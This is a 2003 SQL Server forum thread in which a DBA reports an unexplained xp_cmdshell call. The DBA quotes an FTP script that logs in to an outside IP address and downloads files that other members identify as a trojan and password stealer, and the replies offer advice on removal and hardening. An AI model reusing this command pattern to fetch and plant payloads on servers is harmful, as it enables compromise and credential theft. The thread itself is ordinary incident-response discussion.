SQL Server Performance

xp_cmdshell "ftp -s:c:winntaxis.cmd"

Discussion in 'General DBA Questions' started by Jon M, Nov 6, 2003.

  1. Jon M Member

    I saw this to one of my processes (spid 53). And no internal developer/user is running this command. Could this be a virus or hacker?

    Anyone seen this before?

    Thanks,
    Jon M
  2. Luis Martin Moderator

  3. Jon M Member

    I think somebody's trying to hack my machine.

    This is the detail of the axis.cmd:
    open 61.240.93.235 444
    max
    payne
    binary
    GET sud.ini
    GET TzoLibr.dll
    GET sud.exe
    BYE
    EXIT

    Any help would be greatly appreciated.

    Jon M
  4. Jon M Member

    I couldn't even delete the process nor delete the user login.

    Help!

    [B)] Jon M [xx(]
  5. ChrisFretwell New Member

    I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed

    Tzolibr.dll is found in a few virus/trojan horses and info gathers.
    Sud.exe is listed as a backdoor thing-y (forgive my lack of technical use, if its not sql related, I probably dont know the language). It is a password stealer so its quite important that you deal with it immediately.


    There is some more detailed info about sud.exe athttp://www3.ca.com/virusinfo/virus.aspx?ID=9739
    This is the closes MS info on ithttp://www.microsoft.com/technet/security/bulletin/ms00-057.asp

    What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites, and microsoft for information on removing this. Start with a google search on sud.exe and see where it leads you, then subsearch etc, until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it.

    Good luck and keep us posted.
    Chris
  6. FrankKalis Moderator

    Piggy-backing on Chris I suggest you take a look at http:www.sqlsecurity.com .
    Very good information on how to secure your server.

    Hm... I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I'll dig.

    Frank
    http://www.insidesql.de
    http://www.familienzirkus.de


    Sorry, too dumb to hack in the coorect link this morning[:I]
  7. Jon M Member

    Thanks for all the info guys.

    Jon M

Share This Page